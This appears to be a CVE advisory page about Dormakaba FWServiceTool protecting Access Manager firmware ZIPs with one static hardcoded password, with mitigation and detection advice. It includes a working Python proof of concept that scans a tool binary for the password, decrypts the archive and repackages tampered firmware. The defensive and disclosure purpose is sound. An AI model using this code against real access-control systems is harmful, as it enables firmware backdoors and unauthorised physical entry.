CVE-2025-59107
📋 TL;DR
Dormakaba's FWServiceTool decrypts the encrypted ZIP files that carry firmware updates for Access Managers with a single static, hardcoded password. Anyone who recovers that password from the tool can extract the firmware and potentially repackage a tampered image under the same password. Organizations using Dormakaba Access Managers with affected firmware versions are vulnerable.
💻 Affected Systems
- Dormakaba Access Managers
- FWServiceTool
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers decrypt firmware, inject malicious code, and deploy compromised firmware to access control systems, potentially gaining unauthorized physical access to secured areas.
Likely Case
Attackers extract legitimate firmware to analyze for other vulnerabilities, or tamper with firmware to create backdoors in access control systems.
If Mitigated
Network segmentation and strict access controls keep untrusted parties away from the FWServiceTool host, the firmware archives and the devices' management interfaces, which limits exposure. They do not change the underlying weakness: the password is the same for every installation, so anyone who obtains a copy of the tool or of an archive can still decrypt it offline.
🎯 Exploit Status
Exploitation requires access to an encrypted firmware ZIP or to the FWServiceTool executable, from which the static password can be recovered (for example by searching the binary for embedded strings or by disassembly). No authentication bypass is needed once the password is known; the password is the only protection on the archive contents, and it does not prove who produced the image.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific patched versions
Vendor Advisory: https://www.dormakabagroup.com/en/security-advisories
Restart Required: Yes
Instructions:
1. Review the Dormakaba security advisory.
2. Identify affected firmware versions.
3. Download updated firmware from Dormakaba.
4. Use the updated FWServiceTool (if provided) to apply the firmware patches.
5. Restart Access Manager devices after the update.
🔧 Temporary Workarounds
Network Segmentation
Isolate Access Managers and FWServiceTool from untrusted networks to prevent unauthorized access.
Restrict Tool Access
Limit access to FWServiceTool to authorized administrators only, using file permissions and access controls.
🧯 If You Can't Patch
- Monitor network traffic to/from Access Managers for unusual firmware update attempts.
- Physically secure Access Manager devices and limit administrative access to trusted personnel only.
🔍 How to Verify
Check if Vulnerable:
You are in scope if firmware for your Access Managers is delivered as encrypted ZIP files and applied with FWServiceTool. Confirming the weakness directly means recovering the password embedded in the FWServiceTool executable (a strings-style scan of the binary or disassembly; this is reverse engineering, so do it on a copy in a lab) and checking that the same password opens firmware archives from different releases.
Check Version:
Check device firmware version via Access Manager interface or vendor documentation.
Verify Fix Applied:
Verify that the firmware version after the update matches the patched version from the vendor advisory. Confirm that new firmware ZIP files no longer open with the old static password and do not share one password across archives; note that a password only hides the archive contents and by itself does not prove the image came from the vendor.
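The two checks above (recovering the password embedded in the tool, and confirming that archives no longer open with one static password) can be exercised end to end in Python. The following is an added example, not code from Dormakaba or from this page: it implements the legacy ZipCrypto scheme so it can build a sample encrypted archive, pulls printable ASCII and UTF-16LE string candidates out of a constructed stand-in for the tool binary, and tests each candidate with the standard library's zipfile module. The password, the fake binary, the entry name and the firmware payload are all constructed placeholders; nothing here is the real value.

```python
"""Added example, not Dormakaba's code: a ZipCrypto-encrypted "firmware" ZIP locked
with one static password, a strings-style scan of a constructed tool binary for
candidate passwords, and a check of each candidate with the zipfile module."""
import io
import re
import struct
import zipfile
import zlib


def _gen_crc(c):
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    return c


_CRC_TABLE = [_gen_crc(i) for i in range(256)]


class ZipCryptoEncrypter:
    """Keystream for traditional PKWARE encryption; mirrors CPython's _ZipDecrypter."""

    def __init__(self, pwd):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in pwd:
            self._update(b)

    def _update(self, b):
        self.k0 = (self.k0 >> 8) ^ _CRC_TABLE[(self.k0 ^ b) & 0xFF]
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ _CRC_TABLE[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def encrypt(self, data):
        out = bytearray()
        for c in data:
            k = self.k2 | 2
            out.append(c ^ (((k * (k ^ 1)) >> 8) & 0xFF))
            self._update(c)  # key state advances on the plaintext byte
        return bytes(out)


def build_encrypted_zip(name, plain, pwd):
    """One stored entry with flag bit 0 set: 12-byte encryption header, then payload."""
    crc = zlib.crc32(plain) & 0xFFFFFFFF
    enc = ZipCryptoEncrypter(pwd)
    header = bytes(range(11)) + bytes([(crc >> 24) & 0xFF])  # last byte = password check
    body = enc.encrypt(header) + enc.encrypt(plain)
    fname = name.encode()
    t, d = 0, ((2025 - 1980) << 9) | (1 << 5) | 1  # DOS time/date for 2025-01-01 00:00
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, 1, 0, t, d,
                        crc, len(body), len(plain), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, 1, 0, t, d,
                          crc, len(body), len(plain), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central),
                       len(local) + len(body), 0)
    return local + body + central + eocd


def string_candidates(blob, min_len=8):
    """strings-style triage: printable ASCII runs plus UTF-16LE runs (how .NET stores literals)."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)
    utf16_runs = [m.decode("utf-16-le").encode() for m in
                  re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob)]
    return list(dict.fromkeys(ascii_runs + utf16_runs))  # dedupe, keep order


def find_archive_password(archive, candidates):
    """First candidate that decrypts every entry. zipfile rejects a wrong password via
    the 1-byte header check (RuntimeError) or, for the 1 in 256 that slip past it,
    via the CRC-32 of the decrypted data (BadZipFile)."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for cand in candidates:
            try:
                for n in zf.namelist():
                    zf.read(n, pwd=cand)
                return cand
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None


def extract_entry(archive, name, pwd):
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(name, pwd=pwd)


# Constructed stand-ins, none of them real Dormakaba artefacts.
STATIC_PWD = b"Example-Static-Fw-Key"  # placeholder, not the real password
FAKE_TOOL_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 16 + b"This program cannot be run in DOS mode.\x00" + b"\x00" * 8
    + "FirmwareUpdate.zip".encode("utf-16-le") + b"\x00\x00"
    + STATIC_PWD.decode().encode("utf-16-le") + b"\x00\x00"
    + b"ZipFile.ExtractToDirectory\x00" + b"\x00" * 16)
FIRMWARE_IMAGE = b"AM-FIRMWARE-IMAGE (constructed sample payload)\n" * 4
FIRMWARE_ZIP = build_encrypted_zip("firmware.bin", FIRMWARE_IMAGE, STATIC_PWD)

if __name__ == "__main__":
    found = find_archive_password(FIRMWARE_ZIP, string_candidates(FAKE_TOOL_BINARY))
    print("recovered password:", found)
    # With the password known, a modified image repacked under the same password is
    # accepted just like the original: the scheme encrypts but does not authenticate.
    tampered = build_encrypted_zip("firmware.bin", FIRMWARE_IMAGE.replace(b"IMAGE", b"PATCHED"), found)
    print("tampered archive opens:", extract_entry(tampered, "firmware.bin", found)[:32])
```

To run the same check against real artefacts, feed the tool executable to string_candidates and a real archive to find_archive_password. The 8-bit check byte lets roughly one wrong password in 256 past the first test, which is why the loop also relies on the CRC-32 mismatch. The repack in the main block is the point of the advisory: with one static password there is nothing to stop a modified image from being packaged so that the tool accepts it.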
📡 Detection & Monitoring
Log Indicators:
- Unauthorized firmware update attempts in Access Manager logs
- Decryption or unpacking errors reported by FWServiceTool on the update workstation (decryption of a copied archive on an attacker's own machine leaves no trace in your logs)
Network Indicators:
- Unusual network traffic to/from Access Managers during non-maintenance windows
- Firmware file transfers from untrusted sources
SIEM Query:
Search Access Manager and update-workstation logs for firmware update events (image upload, update start, update complete) outside scheduled maintenance periods, or originating from hosts not approved to run FWServiceTool.
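As an added example of that query logic (not from the page or the vendor), the filter below runs over constructed log lines and flags firmware update events that fall outside a maintenance window or come from an unapproved host. The line format, event names, window and allowlist are all assumptions to be replaced with your own.

```python
"""Added example, not vendor code: flag firmware-update events on Access Managers that
occur outside a maintenance window or come from a host not approved to run FWServiceTool.
The log line shape, event names, window and allowlist below are assumptions."""
import re
from datetime import datetime, time

MAINT_WEEKDAY = 6                                  # assumed window: Sundays (Monday=0)
MAINT_START, MAINT_END = time(2, 0), time(4, 0)    # 02:00-04:00 device-local time
APPROVED_UPDATE_HOSTS = {"10.20.0.15"}             # assumed FWServiceTool workstation(s)

# Assumed syslog-like shape: "<ISO timestamp> <device> <event> src=<ip> ..."
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<device>\S+) (?P<event>\S+) src=(?P<src>\S+)")
FIRMWARE_EVENTS = {"FW_UPDATE_START", "FW_IMAGE_UPLOAD", "FW_UPDATE_COMPLETE"}


def in_maintenance_window(ts_iso):
    ts = datetime.fromisoformat(ts_iso)
    return ts.weekday() == MAINT_WEEKDAY and MAINT_START <= ts.time() < MAINT_END


def triage(lines):
    """Return (reason, line) pairs for firmware events that warrant a look."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["event"] not in FIRMWARE_EVENTS:
            continue
        reasons = []
        if not in_maintenance_window(m["ts"]):
            reasons.append("outside maintenance window")
        if m["src"] not in APPROVED_UPDATE_HOSTS:
            reasons.append("unapproved update source")
        if reasons:
            findings.append(("; ".join(reasons), line))
    return findings


# Constructed sample lines (not real device output). 2025-10-05 is a Sunday.
SAMPLE_LOG = [
    "2025-10-05T02:15:00 am-lobby-01 FW_UPDATE_START src=10.20.0.15 file=firmware.zip",
    "2025-10-05T02:20:00 am-lobby-01 FW_UPDATE_COMPLETE src=10.20.0.15 version=1.2.3",
    "2025-10-07T13:42:10 am-lobby-01 FW_IMAGE_UPLOAD src=10.20.0.15 file=firmware.zip",
    "2025-10-05T03:05:00 am-dock-02 FW_UPDATE_START src=192.168.77.9 file=firmware.zip",
    "2025-10-05T03:06:00 am-dock-02 DOOR_OPEN src=192.168.77.9 reader=2",
]

if __name__ == "__main__":
    for reason, line in triage(SAMPLE_LOG):
        print(f"[{reason}] {line}")
```

The first two sample lines are a legitimate Sunday-night update and produce nothing; the Tuesday upload and the in-window update from an unknown host are each flagged with the matching reason, and the door event is ignored because it is not a firmware event.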